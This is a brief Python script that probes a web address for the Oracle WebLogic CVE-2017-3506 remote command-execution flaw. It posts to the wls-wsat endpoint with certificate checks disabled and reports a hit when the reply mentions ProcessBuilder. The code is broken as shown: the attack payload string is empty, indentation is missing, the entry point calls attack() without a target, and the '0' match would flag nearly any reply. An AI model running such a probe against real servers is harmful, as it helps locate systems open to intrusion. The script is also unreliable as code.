# -*- coding: utf-8 -*-
# auther:dayu
import requests
import re
heads = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'text/xml;charset=UTF-8'
}
def attack(url):
if not url.startswith("http"):
url = "http://" + url
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
'''
print('[+]开始检测-Weblogic-CVE-2017-3506。[+]')
try:
response = requests.post(
url, data=post_str, verify=False, timeout=5, headers=heads)
response = response.text
response = re.search(
r"\.*\<\/faultstring\>", response).group(0)
except Exception:
response = ""
if 'java.lang.ProcessBuilder' in response or "0" in response:
print('[+]发现 CVE-2017-3506 !!!')
else:
print('[-]未发现 CVE-2017-3506 ')
print('[+]检测结束-Weblogic-CVE-2017-3506。[+]')
print('\n')
if __name__ == '__main__':
attack()